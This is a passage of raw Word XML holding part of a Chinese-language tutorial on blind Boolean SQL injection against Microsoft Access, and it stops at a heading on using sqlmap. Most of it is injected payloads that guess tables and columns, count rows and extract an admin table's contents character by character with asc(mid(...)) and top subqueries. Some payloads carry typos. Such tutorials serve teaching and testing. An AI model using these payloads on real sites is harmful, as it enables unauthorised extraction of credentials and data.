    <w:p w14:paraId="255465EE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判断有admin表后，再判断admin表有多少列，假如1-10正常查询，11列报语法报错，那说明有10列</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D70F3D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and exists(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve">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number"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22705E58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lastRenderedPageBreak/>
        <w:t>判断出存在的列数后，再判断具体的列名。以下语句判断是否存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>列，如果存在，正常查询，如果不存在，则报语法错误。然后再通过枚举列名爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE01EE0" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>exists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700D4719" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>猜测完表名和字段名后，我们就看看这个表里面有多少行数据 ，如果&gt;99查询正确，&gt;100查询错误(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7C79E5"/>
        </w:rPr>
        <w:t>这里是查询错误，而不是语法错误</w:t>
      </w:r>
      <w:r>
        <w:t>)，说明有100行数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486D6E1C" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>and (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve">(*) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> information)&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292614E5" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>然后在猜测每个字段具体的数据了 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FC5E2C" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>access数据库中没有 limit，就不能限制查询出来的行数。但是我们可以使用top命令，top 1是将查询的所有数据只显示第一行，所以 top3就是显示查询出来的前三行数据了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B594AD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猜测admin列的第一个数据的长度，如果大于5查询不出数据，大于4正常，说明admin列的第一个数据长度是5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611590C1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and (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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>)&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135F2923" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B9E235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猜测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>列的第一行数据的第一个字符的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>ascii</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>码值，如果大于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>97</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>查询不出数据，大于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>96</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>正常，说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>列的第一行数据的第一个字符的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>ascii</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>值是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>97</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A27D177" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>asc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>mid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>)&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>97</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549B7D46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第一行数据的第二个字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C21C55D" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>asc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>mid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>)&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>97</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669D5FF1" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E7694C4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从第二行开始，查询数据就得用另外的语句了,因为这里的top只能显示查询前几条数据，所以我们得用联合查询，先查询前两条，然后倒序，然后在找出第一条，这就是第二条数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6635F27A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查询第二行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>列的长度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA412E7" w14:textId="187A6DFF" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> top</w:t>
      </w:r>
      <w:r w:rsidR="00CE2028">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00CE2028">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00CE2028">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidR="00CE2028">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>(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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> information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keyword"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve">) 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keyword"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>desc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>)&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377606EE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下面是查询第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>条数据的第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>个字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F4983A" w14:textId="16F315A0" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>asc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>mid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve">)) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> ( </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>elect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> top </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> information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keyword"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00CE2028">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve">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keyword"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>desc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>)&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5380B2A6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查询第三条数据的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>个字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B527262" w14:textId="069167EE" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>asc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>mid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve">)) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> ( 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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> information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keyword"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve">) 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keyword"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>desc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>)&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
        </w:rPr>
        <w:t>55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34173202" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRPr="008F5DDF" w:rsidRDefault="008F5DDF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52363D1" w14:textId="410E128C" w:rsidR="009B36FD" w:rsidRDefault="009B36FD" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Sqlmap注入Access数据库</w:t>
      </w:r>
